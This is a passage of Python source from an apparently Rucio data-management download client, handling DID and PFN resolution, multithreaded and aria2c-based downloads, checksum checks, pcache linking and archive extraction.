logger.info('Processing %d item(s) for input' % len(items))
input_items = []
for item in items:
did_str = item.get('did')
pfn = item.get('pfn')
rse = item.get('rse')
if not did_str or not pfn or not rse:
logger.debug(item)
raise InputValidationError('The keys did, pfn, and rse are mandatory')
logger.debug('Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse))
if '*' in did_str:
logger.debug(did_str)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
did_scope, did_name = self._split_did_str(did_str)
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'),
did_scope, did_name,
item.get('no_subdir'))
item['scope'] = did_scope
item['name'] = did_name
item['sources'] = [{'pfn': pfn, 'rse': rse}]
dest_file_path = os.path.join(dest_dir_path, did_name)
item['dest_file_paths'] = [dest_file_path]
item['temp_file_path'] = '%s.part' % dest_file_path
options = item.setdefault('merged_options', {})
options.setdefault('ignore_checksum', item.pop('ignore_checksum', True))
options.setdefault('transfer_timeout', item.pop('transfer_timeout', None))
input_items.append(item)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
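    # Illustrative call, not part of the original client (scope, file name, PFN and RSE are placeholders):
    #   client = DownloadClient()
    #   client.download_pfns([{'did': 'user.jdoe:file.root',
    #                          'pfn': 'https://some-storage.example.org/path/file.root',
    #                          'rse': 'EXAMPLE_DATADISK',
    #                          'base_dir': '/tmp'}])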
def download_dids(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None):
"""
Download items with given DIDs. This function can also download datasets and wildcarded DIDs.
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name')
filters - Filter to select DIDs for download. Optional if DID is given
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False)
resolve_archives - Deprecated: Use no_resolve_archives instead
force_scheme - Optional: force a specific scheme to download this item. (Default: None)
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
                     nrandom          - Optional: if the DID addresses a dataset, nrandom files will be randomly chosen for download from the dataset
                     ignore_checksum  - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalogue. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger.info('Processing %d item(s) for input' % len(items))
download_info = self._resolve_and_merge_input_items(copy.deepcopy(items))
did_to_options = download_info['did_to_options']
merged_items = download_info['merged_items']
self.logger.debug('num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items)))
logger.info('Getting sources of DIDs')
# if one item wants to resolve archives we enable it for all items
resolve_archives = not all(item.get('no_resolve_archives') for item in merged_items)
merged_items_with_sources = self._get_sources(merged_items, resolve_archives=resolve_archives)
input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=resolve_archives)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
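    # Illustrative call, not part of the original client (DID, RSE and the nrandom value are placeholders):
    #   DownloadClient().download_dids([{'did': 'user.jdoe:my.dataset',
    #                                    'rse': 'EXAMPLE_DATADISK',
    #                                    'nrandom': 5,
    #                                    'base_dir': '/tmp'}])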
def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}, traces_copy_out=None):
"""
Download items using a given metalink file.
:param item: dictionary describing an item to download. Keys:
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
                     ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalogue. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
logger.info('Getting sources from metalink file')
metalinks = parse_replicas_from_file(metalink_file_path)
trace_custom_fields['uuid'] = generate_uuid()
did_to_options = {}
        item.setdefault('destinations', set()).add((item.get('base_dir', '.'), item.get('no_subdir', False)))  # fall back to the documented defaults
for metalink in metalinks:
did_to_options[metalink['did']] = item
metalinks = [metalinks]
input_items = self._prepare_items_for_download(did_to_options, metalinks)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def _download_multithreaded(self, input_items, num_threads, trace_custom_fields={}, traces_copy_out=None):
"""
Starts an appropriate number of threads to download items from the input list.
(This function is meant to be used as class internal only)
:param input_items: list containing the input items to download
:param num_threads: suggestion of how many threads should be started
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: list with output items as dictionaries
"""
logger = self.logger
num_files = len(input_items)
nlimit = 5
num_threads = max(1, num_threads)
num_threads = min(num_files, num_threads, nlimit)
input_queue = Queue()
output_queue = Queue()
input_queue.queue = deque(input_items)
if num_threads < 2:
logger.info('Using main thread to download %d file(s)' % num_files)
self._download_worker(input_queue, output_queue, trace_custom_fields, traces_copy_out, '')
return list(output_queue.queue)
logger.info('Using %d threads to download %d files' % (num_threads, num_files))
threads = []
for thread_num in range(1, num_threads + 1):
log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads)
kwargs = {'input_queue': input_queue,
'output_queue': output_queue,
'trace_custom_fields': trace_custom_fields,
'traces_copy_out': traces_copy_out,
'log_prefix': log_prefix}
try:
thread = Thread(target=self._download_worker, kwargs=kwargs)
thread.start()
threads.append(thread)
except Exception as error:
logger.warning('Failed to start thread %d' % thread_num)
logger.debug(error)
try:
logger.debug('Waiting for threads to finish')
for thread in threads:
thread.join()
except KeyboardInterrupt:
logger.warning('You pressed Ctrl+C! Exiting gracefully')
for thread in threads:
thread.kill_received = True
return list(output_queue.queue)
def _download_worker(self, input_queue, output_queue, trace_custom_fields, traces_copy_out, log_prefix):
"""
This function runs as long as there are items in the input queue,
downloads them and stores the output in the output queue.
(This function is meant to be used as class internal only)
:param input_queue: queue containing the input items to download
:param output_queue: queue where the output items will be stored
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
"""
logger = self.logger
logger.debug('%sStart processing queued downloads' % log_prefix)
while True:
try:
item = input_queue.get_nowait()
except Empty:
break
try:
trace = copy.deepcopy(self.trace_tpl)
trace.update(trace_custom_fields)
download_result = self._download_item(item, trace, traces_copy_out, log_prefix)
output_queue.put(download_result)
except KeyboardInterrupt:
logger.warning('You pressed Ctrl+C! Exiting gracefully')
                os.kill(os.getpgrp(), signal.SIGINT)  # signal the whole process group so the main thread is interrupted too
break
except Exception as error:
logger.error('%sFailed to download item' % log_prefix)
logger.debug(error)
def _download_item(self, item, trace, traces_copy_out, log_prefix=''):
"""
Downloads the given item and sends traces for success/failure.
(This function is meant to be used as class internal only)
:param item: dictionary that describes the item to download
:param trace: dictionary representing a pattern of trace that will be send
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
:returns: dictionary with all attributes from the input item and a clientState attribute
"""
logger = self.logger
pcache = Pcache() if self.check_pcache and len(item.get('archive_items', [])) == 0 else None
did_scope = item['scope']
did_name = item['name']
did_str = '%s:%s' % (did_scope, did_name)
logger.info('%sPreparing download of %s' % (log_prefix, did_str))
trace['scope'] = did_scope
trace['filename'] = did_name
trace.setdefault('datasetScope', item.get('dataset_scope', ''))
trace.setdefault('dataset', item.get('dataset_name', ''))
trace.setdefault('filesize', item.get('bytes'))
dest_file_paths = item['dest_file_paths']
# appending trace to list reference, if the reference exists
if traces_copy_out is not None:
traces_copy_out.append(trace)
# if file already exists make sure it exists at all destination paths, set state, send trace, and return
for dest_file_path in dest_file_paths:
if os.path.isfile(dest_file_path):
logger.info('%sFile exists already locally: %s' % (log_prefix, did_str))
for missing_file_path in dest_file_paths:
if not os.path.isfile(missing_file_path):
logger.debug("copying '%s' to '%s'" % (dest_file_path, missing_file_path))
shutil.copy2(dest_file_path, missing_file_path)
item['clientState'] = 'ALREADY_DONE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'ALREADY_DONE'
                self._send_trace(trace)
return item
# check if file has replicas
sources = item.get('sources')
if not sources or not len(sources):
logger.warning('%sNo available source found for file: %s' % (log_prefix, did_str))
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
trace['stateReason'] = 'No available sources'
self._send_trace(trace)
return item
# checking Pcache
storage_prefix = None
if pcache:
# to check only first replica is enough
pfn = sources[0]['pfn']
rse_name = sources[0]['rse']
# protocols are needed to extract deterministic part of the pfn
scheme = None
prots = self.client.get_protocols(rse_name)
for prot in prots:
if prot['scheme'] in pfn and prot['prefix'] in pfn:
scheme = prot['scheme']
storage_prefix = prot['prefix']
# proceed with the actual check
logger.info('Checking whether %s is in pcache' % dest_file_path)
pcache_state = None
hardlink_state = None
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, dst=dest_file_path)
except Exception as e:
logger.warning('Pcache failure: %s' % str(e))
# if file found in pcache, send trace and return
if pcache_state == 0 and hardlink_state == 1:
logger.info('File found in pcache.')
item['clientState'] = 'FOUND_IN_PCACHE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'FOUND_IN_PCACHE'
self._send_trace(trace)
return item
else:
logger.info('File not found in pcache.')
        # try different PFNs until one succeeds
temp_file_path = item['temp_file_path']
success = False
i = 0
while not success and i < len(sources):
source = sources[i]
i += 1
pfn = source['pfn']
rse_name = source['rse']
scheme = pfn.split(':')[0]
try:
rse = rsemgr.get_rse_info(rse_name)
except RucioException as error:
logger.warning('%sCould not get info of RSE %s: %s' % (log_prefix, rse_name, error))
trace['stateReason'] = str(error)
continue
trace['remoteSite'] = rse_name
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
trace['protocol'] = scheme
logger.info('%sTrying to download with %s from %s: %s ' % (log_prefix, scheme, rse_name, did_str))
try:
protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme)
protocol.connect()
except Exception as error:
logger.warning('%sFailed to create protocol for PFN: %s' % (log_prefix, pfn))
logger.debug('scheme: %s, exception: %s' % (scheme, error))
trace['stateReason'] = str(error)
continue
attempt = 0
retries = 2
# do some retries with the same PFN if the download fails
while not success and attempt < retries:
attempt += 1
item['attemptnr'] = attempt
if os.path.isfile(temp_file_path):
logger.debug('%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path))
os.unlink(temp_file_path)
start_time = time.time()
try:
protocol.get(pfn, temp_file_path, transfer_timeout=item.get('merged_options', {}).get('transfer_timeout'))
success = True
except Exception as error:
logger.debug(error)
trace['clientState'] = str(type(error).__name__)
trace['stateReason'] = str(error)
end_time = time.time()
if success and not item.get('merged_options', {}).get('ignore_checksum', False):
rucio_checksum = item.get('adler32')
local_checksum = None
if rucio_checksum is None:
rucio_checksum = item.get('md5')
if rucio_checksum is None:
logger.warning('%sNo remote checksum available. Skipping validation.' % log_prefix)
else:
local_checksum = md5(temp_file_path)
else:
local_checksum = adler32(temp_file_path)
if rucio_checksum != local_checksum:
success = False
os.unlink(temp_file_path)
logger.warning('%sChecksum validation failed for file: %s' % (log_prefix, did_str))
logger.debug('Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
trace['clientState'] = 'FAIL_VALIDATE'
trace['stateReason'] = 'Checksum validation failed: Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum)
if not success:
logger.warning('%sDownload attempt failed. Try %s/%s' % (log_prefix, attempt, retries))
self._send_trace(trace)
protocol.close()
if not success:
logger.error('%sFailed to download file %s' % (log_prefix, did_str))
item['clientState'] = 'FAILED'
return item
dest_file_path_iter = iter(dest_file_paths)
first_dest_file_path = next(dest_file_path_iter)
logger.debug("renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path))
os.rename(temp_file_path, first_dest_file_path)
# if the file was downloaded with success, it can be linked to pcache
if pcache:
            logger.info('File %s is going to be registered into pcache.' % first_dest_file_path)
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, local_src=first_dest_file_path)
                logger.info('File %s is now registered into pcache.' % first_dest_file_path)
except Exception as e:
logger.warning('Failed to load file to pcache: %s' % str(e))
for cur_dest_file_path in dest_file_path_iter:
logger.debug("copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
trace['clientState'] = 'DONE'
trace['stateReason'] = 'OK'
item['clientState'] = 'DONE'
self._send_trace(trace)
duration = round(end_time - start_time, 2)
size = item.get('bytes')
size_str = sizefmt(size, self.is_human_readable)
if size and duration:
rate = round((size / duration) * 1e-6, 2)
logger.info('%sFile %s successfully downloaded. %s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate))
else:
logger.info('%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration))
file_items_in_archive = item.get('archive_items', [])
if len(file_items_in_archive) > 0:
logger.info('%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name))
archive_file_path = first_dest_file_path
for file_item in file_items_in_archive:
extraction_ok = False
extract_file_name = file_item['name']
dest_file_path_iter = iter(file_item['dest_file_paths'])
first_dest_file_path = next(dest_file_path_iter)
dest_dir = os.path.dirname(first_dest_file_path)
logger.debug('%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir))
for extraction_tool in self.extraction_tools:
if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir):
extraction_ok = True
break
if not extraction_ok:
logger.error('Extraction of file %s from archive %s failed.' % (extract_file_name, did_name))
continue
first_dest_file_path = os.path.join(dest_dir, extract_file_name)
for cur_dest_file_path in dest_file_path_iter:
logger.debug("copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
if not item.get('shall_keep_archive'):
logger.debug('%sDeleting archive %s' % (log_prefix, did_name))
os.remove(archive_file_path)
return item
def download_aria2c(self, items, trace_custom_fields={}, filters={}):
"""
Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs.
It only can download files that are available via https/davs.
Aria2c needs to be installed and X509_USER_PROXY needs to be set!
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
                     nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly chosen for download from the dataset
                     ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalogue. (Default: False)
:param trace_custom_fields: Custom key value pairs to send with the traces
:param filters: dictionary containing filter options
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something went wrong during the download (e.g. aria2c could not be started)
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
rpc_secret = '%x' % (random.getrandbits(64))
rpc_auth = 'token:%s' % rpc_secret
rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret)
for item in items:
item['force_scheme'] = ['https', 'davs']
logger.info('Processing %d item(s) for input' % len(items))
download_info = self._resolve_and_merge_input_items(copy.deepcopy(items))
did_to_options = download_info['did_to_options']
merged_items = download_info['merged_items']
self.logger.debug('num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items)))
logger.info('Getting sources of DIDs')
merged_items_with_sources = self._get_sources(merged_items)
input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=False)
        output_items = []  # ensure the name is defined even if the download raises before assignment
        try:
output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields)
except Exception as error:
self.logger.error('Unknown exception during aria2c download')
self.logger.debug(error)
finally:
try:
aria_rpc.aria2.forceShutdown(rpc_auth)
finally:
rpcproc.terminate()
return self._check_output(output_items)
def _start_aria2c_rpc(self, rpc_secret):
"""
Starts aria2c in RPC mode as a subprocess. Also creates
the RPC proxy instance.
(This function is meant to be used as class internal only)
:param rpc_secret: the secret for the RPC proxy
        :returns: a tuple with the process and the rpc proxy objects
:raises RucioException: if the process or the proxy could not be created
"""
logger = self.logger
try:
from xmlrpclib import ServerProxy as RPCServerProxy # py2
except ImportError:
from xmlrpc.client import ServerProxy as RPCServerProxy
cmd = 'aria2c '\
'--enable-rpc '\
'--certificate=$X509_USER_PROXY '\
'--private-key=$X509_USER_PROXY '\
'--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\
'--quiet=true '\
'--allow-overwrite=true '\
'--auto-file-renaming=false '\
'--stop-with-process=%d '\
'--rpc-secret=%s '\
'--rpc-listen-all=false '\
'--rpc-max-request-size=100M '\
'--connect-timeout=5 '\
'--rpc-listen-port=%d'
logger.info('Starting aria2c rpc server...')
# trying up to 3 random ports
for attempt in range(3):
port = random.randint(1024, 65534)
logger.debug('Trying to start rpc server on port: %d' % port)
try:
to_exec = cmd % (os.getpid(), rpc_secret, port)
logger.debug(to_exec)
rpcproc = execute(to_exec, False)
except Exception as error:
raise RucioException('Failed to execute aria2c!', error)
# if port is in use aria should fail to start so give it some time
time.sleep(2)
# did it fail?
if rpcproc.poll() is not None:
(out, err) = rpcproc.communicate()
logger.debug('Failed to start aria2c with port: %d' % port)
logger.debug('aria2c output: %s' % out)
else:
break
if rpcproc.poll() is not None:
raise RucioException('Failed to start aria2c rpc server!')
try:
aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port)
except Exception as error:
rpcproc.kill()
raise RucioException('Failed to initialise rpc proxy!', error)
return (rpcproc, aria_rpc)
def _download_items_aria2c(self, items, aria_rpc, rpc_auth, trace_custom_fields={}):
"""
Uses aria2c to download the given items. Aria2c needs to be started
as RPC background process first and a RPC proxy is needed.
(This function is meant to be used as class internal only)
:param items: list of dictionaries containing one dict for each file to download
:param aria_rcp: RPCProxy to the aria2c process
:param rpc_auth: the rpc authentication token
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
"""
logger = self.logger
gid_to_item = {} # maps an aria2c download id (gid) to the download item
pfn_to_rse = {}
items_to_queue = [item for item in items]
# items get removed from gid_to_item when they are complete or failed
while len(gid_to_item) or len(items_to_queue):
num_queued = 0
# queue up to 100 files and then check arias status
while (num_queued < 100) and len(items_to_queue):
item = items_to_queue.pop()
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
trace = {'scope': file_scope,
'filename': file_name,
'datasetScope': item.get('dataset_scope', ''),
'dataset': item.get('dataset_name', ''),
'protocol': 'https',
'remoteSite': '',
'filesize': item.get('bytes', None),
'transferStart': time.time(),
'transferEnd': time.time()}
trace.update(self.trace_tpl)
trace.update(trace_custom_fields)
# get pfns from all replicas
pfns = []
for src in item['sources']:
pfn = src['pfn']
if pfn[0:4].lower() == 'davs':
pfn = pfn.replace('davs', 'https', 1)
pfns.append(pfn)
pfn_to_rse[pfn] = src['rse']
# does file exist and are sources available?
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
if os.path.isfile(dest_file_path):
logger.info('File exists already locally: %s' % file_did_str)
item['clientState'] = 'ALREADY_DONE'
trace['clientState'] = 'ALREADY_DONE'
self._send_trace(trace)
elif len(pfns) == 0:
logger.warning('No available source found for file: %s' % file_did_str)
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
self._send_trace(trace)
else:
item['trace'] = trace
options = {'dir': os.path.dirname(dest_file_path),
'out': os.path.basename(item['temp_file_path'])}
gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options)
gid_to_item[gid] = item
num_queued += 1
logger.debug('Queued file: %s' % file_did_str)
# get some statistics
aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth)
num_active = int(aria_stat['numActive'])
num_waiting = int(aria_stat['numWaiting'])
num_stopped = int(aria_stat['numStoppedTotal'])
# save start time if one of the active downloads has started
active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength'])
for dlinfo in active:
gid = dlinfo['gid']
if int(dlinfo['completedLength']) > 0:
gid_to_item[gid].setdefault('transferStart', time.time())
stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files'])
for dlinfo in stopped:
gid = dlinfo['gid']
item = gid_to_item[gid]
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
temp_file_path = item['temp_file_path']
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
                # ensure we didn't miss the active state (e.g. a very fast download)
start_time = item.setdefault('transferStart', time.time())
end_time = item.setdefault('transferEnd', time.time())
# get used pfn for traces
trace = item['trace']
for uri in dlinfo['files'][0]['uris']:
if uri['status'].lower() == 'used':
trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '')
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
# ensure file exists
status = dlinfo.get('status', '').lower()
if status == 'complete' and os.path.isfile(temp_file_path):
# checksum check
skip_check = item.get('ignore_checksum', False)
rucio_checksum = 0 if skip_check else item.get('adler32')
local_checksum = 0 if skip_check else adler32(temp_file_path)
if rucio_checksum == local_checksum:
item['clientState'] = 'DONE'
trace['clientState'] = 'DONE'
# remove .part ending
os.rename(temp_file_path, dest_file_path)
# calculate duration
duration = round(end_time - start_time, 2)
duration = max(duration, 0.01) # protect against 0 division
size = item.get('bytes', 0)
rate = round((size / duration) * 1e-6, 2)
size_str = sizefmt(size, self.is_human_readable)
logger.info('File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str,
size_str,
duration,
rate))
else:
os.unlink(temp_file_path)
logger.warning('Checksum validation failed for file: %s' % file_did_str)
logger.debug('Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
item['clientState'] = 'FAIL_VALIDATE'
trace['clientState'] = 'FAIL_VALIDATE'
else:
logger.error('Failed to download file: %s' % file_did_str)
logger.debug('Aria2c status: %s' % status)
item['clientState'] = 'FAILED'
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
self._send_trace(trace)
del item['trace']
aria_rpc.aria2.removeDownloadResult(rpc_auth, gid)
del gid_to_item[gid]
if len(stopped) > 0:
logger.info('Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped))
return items
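    # Note on the aria2c control flow above: it relies on the standard aria2 JSON-RPC methods
    # already referenced in the code (aria2.addUri, aria2.getGlobalStat, aria2.tellActive,
    # aria2.tellStopped, aria2.removeDownloadResult). A download is queued with addUri,
    # polled via tellActive/tellStopped, and its result record is dropped with
    # removeDownloadResult once the item has been traced and marked DONE/FAILED.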
def _resolve_and_merge_input_items(self, items):
"""
This function takes the input items given to download_dids etc. and merges them
respecting their individual options. This way functions can operate on these items
in batch mode. E.g., list_replicas calls are reduced.
:param items: List of dictionaries. Each dictionary describing an input item
:returns: a dictionary with a dictionary that maps the input DIDs to options
and a list with a dictionary for each merged download item
:raises InputValidationError: if one of the input items is in the wrong format
"""
logger = self.logger
# check mandatory options before doing any server calls
for item in items:
if item.get('resolve_archives') is not None:
logger.warning('resolve_archives option is deprecated and will be removed in a future release.')
item.setdefault('no_resolve_archives', not item.pop('resolve_archives'))
did = item.get('did', [])
if len(did) == 0:
if not item.get('filters', {}).get('scope'):
logger.debug(item)
raise InputValidationError('Item without did and filter/scope')
item['did'] = [None]
elif not isinstance(did, list):
item['did'] = [did]
distinct_keys = ['rse', 'force_scheme', 'nrandom']
all_resolved_did_strs = set()
did_to_options = {}
merged_items = []
download_info = {'did_to_options': did_to_options,
'merged_items': merged_items}
while len(items) > 0:
item = items.pop()
filters = item.get('filters', {})
item_dids = item.pop('did')
if item_dids[0] is None:
logger.debug('Resolving DIDs by using filter options')
item_dids = []
scope = filters.pop('scope')
for did_name in self.client.list_dids(scope, filters=filters, type='all'):
item_dids.append('%s:%s' % (scope, did_name))
base_dir = item.pop('base_dir', '.')
no_subdir = item.pop('no_subdir', False)
ignore_checksum = item.pop('ignore_checksum', False)
new_transfer_timeout = item.pop('transfer_timeout', None)
resolved_dids = item.setdefault('dids', [])
for did_str in item_dids:
did_scope, did_name = self._split_did_str(did_str)
tmp_did_names = []
if '*' in did_name:
filters['name'] = did_name
tmp_did_names = list(self.client.list_dids(did_scope, filters=filters, type='all'))
else:
tmp_did_names = [did_name]
for did_name in tmp_did_names:
resolved_did_str = '%s:%s' % (did_scope, did_name)
options = did_to_options.setdefault(resolved_did_str, {})
options.setdefault('destinations', set()).add((base_dir, no_subdir))
if resolved_did_str in all_resolved_did_strs:
# in this case the DID was already given in another item
# the options of this DID will be ignored and the options of the first item that contained the DID will be used
# another approach would be to compare the options and apply the more relaxed options
logger.debug('Ignoring further options of DID: %s' % resolved_did_str)
continue
options['ignore_checksum'] = (options.get('ignore_checksum') or ignore_checksum)
cur_transfer_timeout = options.setdefault('transfer_timeout', None)
if cur_transfer_timeout is not None and new_transfer_timeout is not None:
options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout))
elif new_transfer_timeout is not None:
options['transfer_timeout'] = int(new_transfer_timeout)
resolved_dids.append({'scope': did_scope, 'name': did_name})
all_resolved_did_strs.add(resolved_did_str)
if len(resolved_dids) == 0:
                logger.warning('An item didn\'t have any DIDs after resolving the input. Ignoring it.')
logger.debug(item)
continue
was_merged = False
for merged_item in merged_items:
if all(item.get(k) == merged_item.get(k) for k in distinct_keys):
merged_item['dids'].extend(resolved_dids)
was_merged = True
break
if not was_merged:
item['dids'] = resolved_dids
merged_items.append(item)
return download_info
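    # Illustrative sketch of the returned structure (derived from the code above; the names are
    # only examples): two input items that agree on the distinct keys 'rse', 'force_scheme' and
    # 'nrandom' end up as a single entry in 'merged_items' whose 'dids' list is the union of
    # their resolved DIDs, while the per-DID options (destinations, ignore_checksum,
    # transfer_timeout) are kept separately in 'did_to_options', keyed by 'scope:name'.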
def _get_sources(self, merged_items, resolve_archives=True):
"""
Get sources (PFNs) of the DIDs.
:param merged_items: list of dictionaries. Each dictionary describes a bunch of DIDs to download
:returns: list of list of dictionaries.
"""
logger = self.logger
merged_items_with_sources = []
for item in merged_items:
# since we're using metalink we need to explicitly give all schemes
schemes = item.get('force_scheme')
if schemes:
schemes = schemes if isinstance(schemes, list) else [schemes]
logger.debug('schemes: %s' % schemes)
# extend RSE expression to exclude tape RSEs for non-admin accounts
rse_expression = item.get('rse')
if self.is_tape_excluded:
rse_expression = '*\istape=true' if not rse_expression else '(%s)\istape=true' % rse_expression
logger.debug('rse_expression: %s' % rse_expression)
# get PFNs of files and datasets
logger.debug('num DIDs for list_replicas call: %d' % len(item['dids']))
metalink_str = self.client.list_replicas(item['dids'],
schemes=schemes,
rse_expression=rse_expression,
client_location=self.client_location,
resolve_archives=resolve_archives,
resolve_parents=True,
metalink=True)
file_items = parse_replicas_from_string(metalink_str)
logger.debug('num resolved files: %s' % len(file_items))
nrandom = item.get('nrandom')
if nrandom:
logger.info('Selecting %d random replicas from DID(s): %s' % (nrandom, item['dids']))
random.shuffle(file_items)
file_items = file_items[0:nrandom]
merged_items_with_sources.append(file_items)
else:
merged_items_with_sources.append(file_items)
return merged_items_with_sources
def _prepare_items_for_download(self, did_to_options, merged_items_with_sources, resolve_archives=True):
"""
Optimises the amount of files to download
(This function is meant to be used as class internal only)
:param did_to_options: dictionary that maps each input DID to some input options
:param merged_items_with_sources: list of dictionaries. Each dictionary describes a bunch of DIDs to download
:returns: list of dictionaries. Each dictionary describes an element to download
:raises InputValidationError: if the given input is not valid or incomplete
"""
logger = self.logger
if resolve_archives:
# perhaps we'll need an extraction tool so check what is installed
self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()]
if len(self.extraction_tools) < 1:
                logger.warning('Archive resolution is enabled but no extraction tool is available. '
                               'Sources whose protocol does not support extraction will not be considered for download.')
